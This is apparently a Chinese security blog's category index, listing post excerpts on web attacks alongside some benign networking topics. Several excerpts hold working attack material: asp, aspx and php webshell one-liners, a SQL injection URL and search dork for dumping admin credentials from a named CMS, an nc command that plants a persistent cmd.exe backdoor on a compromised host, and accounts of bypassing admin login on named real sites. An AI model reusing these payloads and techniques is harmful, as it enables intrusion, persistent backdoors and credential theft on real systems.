随笔 - 825,  文章 - 0,  评论 - 37,  阅读 - 175万

随笔分类 -  WEB安全

一句话安全
摘要:asp一句话:<%eval request("1.2.3")%>aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["1.2.3"])%>php一句话:<?php eval($_POST[1.2.3])?>jsp一句话:<%if(requ 阅读全文
posted @ 2016-08-23 13:24 milantgh 阅读(396) 评论(0) 推荐(0) 编辑
轻取帝国CMS管理员密码
摘要:“帝国”CMS是一套著名的PHP整站程序,是国内使用人数最多的PHPCMS程序之一。令人无奈的是,“帝国”虽然把势力壮大了,却忽略了自身防护的建设,结果在黑客攻击下,“帝国”沦陷了。“帝国”CMS曝出的漏洞能够让黑客在1分钟内拿到管理员的账户密码,之后更能轻松获取webshell。下面让我们一起来对 阅读全文
posted @ 2016-05-01 19:19 milantgh 阅读(7197) 评论(0) 推荐(0) 编辑
SSRF攻击实例解析
摘要:ssrf攻击概述很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击(Server-side Reques... 阅读全文
posted @ 2014-09-18 09:37 milantgh 阅读(569) 评论(0) 推荐(0) 编辑
跨站点端口攻击 – XSPA(SSPA)
摘要:许多Web应用程序提供的功能将数据从其他Web服务器,由于种种原因。下载XML提要,从远程服务器,Web应用程序可以使用用户指定的URL,获取图像,此功能可能会被滥用,使制作的查询使用易受攻击的Web应用程序作为代理运行在远程攻击其他服务的基于文本的文件等。 /本地服务器。通过这种滥用而产生的功能被... 阅读全文
posted @ 2014-09-18 09:35 milantgh 阅读(869) 评论(0) 推荐(0) 编辑
南方数据企业0day
摘要:漏洞影响版本 v10.0 v11.0关键字:inurl:”HomeMarket.asp”默认后台:/admin直接爆用户密码:http://www.xxx.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2... 阅读全文
posted @ 2014-06-07 22:18 milantgh 阅读(962) 评论(0) 推荐(0) 编辑
HTTP Keep-Alive详解
摘要:HTTP是一个请求响应模式的典型范例,即客户端向服务器发送一个请求信息,服务器来响应这个信息。在老的HTTP版本中,每个请求都将被创建一个新的客户端->服务器的连接,在这个连接上发送请求,然后接收请求。这样的模式有一个很大的优点就是,它很简单,很容易理解和编程实现;它也有一个很大的缺点就是,它效率很... 阅读全文
posted @ 2014-06-07 17:06 milantgh 阅读(448) 评论(0) 推荐(0) 编辑
cookie中转注入实战
摘要:随着网络安全技术的发展,SQL注入作为一种很流行的攻击方式被越来越多的人所知晓。很多网站也都对SQL注入做了防护,许多网站管理员的做法就是添加一个防注入程序。这时我们用常规的手段去探测网站的SQL注入漏洞时会被防注入程序阻挡,遇到这种情况我们该怎么办?难道就没有办法了吗?答案是否定的。我 们知道,一... 阅读全文
posted @ 2014-04-24 20:41 milantgh 阅读(1462) 评论(0) 推荐(1) 编辑
x-forwarded-for之深度挖掘
摘要:如今利用nginx做负载均衡的实例已经很多了,针对不同的应用场合,还有很多需要注意的地方,本文要说的就是在通过CDN 后到达nginx做负载均衡时请求头中的X-Forwarded-For项到底发生了什么变化。下图为简单的web架构图:先来看一下X-Forwarded-For的定义:X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。它不是RFC中定义的标准请求头信息,在squid缓存代理服务器开发文档中可以找到该项的详细介绍。标准格式如下:X-Forwarded-For: client1, p 阅读全文
posted @ 2014-04-01 13:15 milantgh 阅读(461) 评论(0) 推荐(0) 编辑
一句话木马的原理及利用
摘要:一句话木马的原理及利用(asp,aspx,php,jsp)一句话木马的适用环境:1.服务器的来宾账户有写入权限2.已知数据库地址且数据库格式为asa或asp3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可一句话木马的工作原理:"一句话木马"服务端(本地的html提交文件)就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中value可以自己修改"一句话木马"客户端(远程服务器上被插入一句话的as 阅读全文
posted @ 2014-03-27 20:55 milantgh 阅读(17404) 评论(0) 推荐(0) 编辑
VLAN讲解
摘要:VLAN(Virtual Local Area Network)的中文名为"虚拟局域网"。VLAN是一种将局域网设备从逻辑上划分成一个个网段,从而实现虚拟工作组的新兴数据交换技术。这一新兴技术主要应用于交换机和路由器中,但主流应用还是在交换机之中。但又不是所有交换机都具有此功能,只有VLAN协议的第二层以上交换机才具有此功能,这一点可以查看相应交换机的说明书即可得知。VLANIEEE于1999年颁布了用于标准化VLAN实现方案的802.1Q协议标准草案。VLAN技术的出现,使得管理员根据实际应用需求,把同一物理局域网内的不同用户逻辑地划分成不同的广播域,每一个VLAN都包含 阅读全文
posted @ 2014-03-27 20:37 milantgh 阅读(1239) 评论(0) 推荐(0) 编辑
cc攻击技术
摘要:攻击者借助代理服务器生成指向受害主机的合法请求,实现DOS,和伪装就叫:cc(ChallengeCollapsar)。CC主要是用来攻击页面的。大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越多,论坛的页面越多,数据库就越大,被访问的频率也越高,占用的系统资源也就相当可观。一个静态页面不需要服务器多少资源,甚至可以说直接从内存中读出来发给你就可以了,但是论坛就不一样了,我看一个帖子,系统需要到数据库中判断我是否有读读帖子的权限,如果有,就读出帖子里面的内容,显示出来——这里至少访问了2次数据库,如果数据库的体积有200MB大小,系统很 阅读全文
posted @ 2014-03-27 20:31 milantgh 阅读(643) 评论(0) 推荐(0) 编辑
伪造发件人之邮件地址之实现
摘要:写了一个利用Jmail组件发匿名邮件的ASP代码,前提是你的SMTP服务器没有验证发件人地址才是,很多虚拟主机的SMTP服务器就可以的。代码如下:JMailSpoof v0.1JMailSpoof by lake2 阅读全文
posted @ 2014-03-27 20:21 milantgh 阅读(992) 评论(0) 推荐(0) 编辑
通过nc构造telnet后门
摘要:nc被称为网络中的“瑞士军刀”,其功能强大,如果在肉鸡上运行“nc.exe –p port –L –d –e cmd.exe”命令就可以构建一个telnet后门,即使关闭了nc.exe程序运行窗口,该后门程序还继续存在。本案例通过一个bat文件来构建一个 telnet后门,当系统重新启动后,该后门会继续存在。当然nc还有许多其它用法: (1)连接到REMOTE主机,格式:nc -nvv 192.168.x.x 80 ,表示连到192.168.x.x的TCP80端口 (2)监听LOCAL主机,格式:nc -l -p 80 ,表示监听本机的TCP80端口 (3)扫描远程主机,格式:nc -n... 阅读全文
posted @ 2014-03-24 14:12 milantgh 阅读(1547) 评论(0) 推荐(0) 编辑
session劫持技术
摘要:目录:0×00 应用程序认证设计背景0×01 常规攻击思路及缺陷0×02 利用应用程序设计缺陷进行Session劫持的攻击原理0×03 Session劫持的大致思路及意义0×04 如何防御这种攻击0×00 应用程序认证设计背景一个应用程序在设计的过程中,为了实现对资源和请求进行管理,用户信息认证是非常重要的一环。由于HTTP请求的无连接性,一般的应用程序都是通过Cookie或者Session来完成认证工作,通过将加密的用户认证信息存储到Cookie中,或者通过赋予客户端的一个Token,通常也就是所说的SessionId来在服务器端直 阅读全文
posted @ 2014-03-23 20:28 milantgh 阅读(505) 评论(0) 推荐(0) 编辑
会话追踪(session tracking)
摘要:HTTP是一种无连接的协议,如果一个客户端只是单纯地请求一个文件(HTML或GIF),服务器端可以响应给客户端,并不需要知道一连串的请求是否来自于相同的客户端,而且也不需要担心客户端是否处在连接状态。但是这样的通信协议使得服务器端难以判断所连接的客户端是否是同一个人。当进行Web程序开发时,我们必须想办法将相关的请求结合一起,并且努力维持用户的状态在服务器上,这就引出了会话追踪(session tracking)。1:会话与会话追踪session中文经常翻译为“会话”,其本来的含义是指有始有终的一系列动作或消息,比如打电话时从拿起电话拨号到挂断电话这中间的一系列过程可以称之为一个session 阅读全文
posted @ 2014-03-23 18:13 milantgh 阅读(1814) 评论(0) 推荐(0) 编辑
GOOGLE突破图书馆入口IP限制之技巧
摘要:很多图书馆都要注册或要本地IP才能浏览或下载图书,有没有另类的快速办法能快速突破图书馆的入口,能随意地下载图书呢?希望大家在GOOGLE里试试这个:“index of/ ” inurl:lib你将进入许多图书馆,并且一定能下载自己喜欢的书籍。1、输入:“index of /” cnki ,可以找到许多图书馆的CNKI、VIP、超星等入口!2、输入:“index of /” ppt ,可以突破网站入口下载powerpint作品!3、输入:“index of /” mp3 ,可以突破网站入口下载mp3、rm等影视作品!4、输入:“index of /” swf ,可以突破网站入口下载fl... 阅读全文
posted @ 2014-03-21 17:47 milantgh 阅读(562) 评论(0) 推荐(0) 编辑
突破IP限制登入网站后台
摘要:后台:http://www.zhuna.cn/sys_admin/输入账号密码点击确定后,跳转到登录界面:http://www.zhuna.cn/sys_admin/login.php很自然的觉得后台部分页面没有访问控制,可以直接进行请求查看。(同时也怀疑可能存在JS访问绕过问题,禁用JS后再进行访问,发现依然如此,故而排除JS绕过的想法。)通过查看HTML源代码,很容易的找到菜单页面名称:http://www.zhuna.cn/sys_admin/menu.php查看menu.php页面的HTML源代码,逐个请求各超链接页面,不难发现其中部分页面是不需要身份验证的(不会跳转到登录页面):以其 阅读全文
posted @ 2014-03-21 17:35 milantgh 阅读(3546) 评论(0) 推荐(0) 编辑
登入爱丽网后台(非JS绕过、非盲打、非IP欺骗)
摘要:后台:http://wed.27.cn/marry/marryadmin/web/login.php不难猜解到后台管理的相关页面名称(不存在的页面服务器返回404,而存在的页面会直接跳转到上面的登录页面)。请求不存在的页面:用firefox禁用JS后请求admin.php页面,依然跳转到登录页面,说明不存在JS绕过的问题。鉴于 WooYun: 我是如何登录住哪网后台的(突破IP限制!) 的灵感,用http editor请求看看,奇迹出现了:如此是何道理?浏览器请求和工具请求没什么区别,怎么就是不一样的结果呢?工具发送的请求也不带有合法的cookie信息,排除cookie的因素,而前面也排除了J 阅读全文
posted @ 2014-03-21 16:54 milantgh 阅读(672) 评论(0) 推荐(0) 编辑
网站后台查找方法总结
摘要:经过很多次的渗透经验,我总结了一套网站后台查找的方法,写出来供大家分享:步骤如下:1.查找网站的robots.txt文件或者sitemap.xml文件,里面有很多目录可利用2.使用御剑逐级渗透,一般都能找到网站后台(找数据库文件也是如此) 阅读全文
posted @ 2014-03-20 19:34 milantgh 阅读(799) 评论(0) 推荐(0) 编辑
BurpSuite之SQL Injection
摘要:BurpSuite之SQL Injection[平台]:mutillidae[工具]BurpSuite 1.4.07 + FireFox1:安装配置mutillidae如果遇到问题,开下面的帖子.http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-102:SQL Injection测试选择“OWASP Top 10″ —>> ”A1 - Injection” —>> ”SQLi - Extract Data” —>> ”U 阅读全文
posted @ 2014-03-20 10:54 milantgh 阅读(768) 评论(0) 推荐(1) 编辑

< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

点击右上角即可分享
微信分享提示